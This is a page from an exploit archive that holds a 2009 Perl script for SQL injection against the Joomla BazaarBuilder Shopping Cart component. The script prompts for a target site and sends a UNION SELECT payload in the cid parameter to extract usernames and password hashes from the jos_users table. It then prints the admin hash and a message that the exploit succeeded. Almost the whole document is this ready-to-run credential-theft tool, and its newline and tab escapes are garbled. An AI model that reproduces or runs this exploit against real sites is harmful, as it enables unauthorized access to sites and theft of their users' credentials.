[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Com BazaarBuilder Shopping Cart v.5.0 SQL Injection Exploit
# Published : 2009-01-21
# Author : XaDoS
# Previous Title : Pardal CMS <= 0.2.0 Blind SQL Injection Exploit
# Next Title : Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability


#!/usr/bin/perl -w
#Joomla component: BazaarBuilder Shopping Cart Software v.5.0 sql injection#
########################################
#[+] Author : XaDoS
#[+] Contact me: www.securitycode.it // xados [at] hotmail [dot] it
#[+] Greetz : Plucky - Str0ke - GsC - boom3rang - My girl ;-)
#[+] Module_Name: BazaarBuilder Ecommerce Shopping Cart Software v. 5.0
#[+] Script_Name: Joomla
#[+] Dork: find it XD
########################################
print "tt-------------------------------------------------------------nn";
print "tt|                  ---||> X:A:D:O:S <||---                    |nn";
print "tt-------------------------------------------------------------nn";
print "tt|Joomla Module com_prod <= Remote SQL Injection Vuln|nn";
print "tt| XaDoS ~ www.securitycode.it |nn";
print "tt-------------------------------------------------------------nn";
use LWP::UserAgent;
print "nEnter the url of vuln site[http://wwww.example.com]: ";
chomp(my $target=<STDIN>);
$column_name="concat(username,char(58),password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browsern";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_prod&task=products&cid=-9999%20union%20all%20select%201,2,3,".$column_name.",5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from/**/".$table_name."+/*+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "n[+] Admin Hash : $1nn";
print "||> Exploit done! ;-) <||nn";
}
else{print "n||> Exploit failed! :-( <||n";
}

# www.Syue.com [2009-01-21]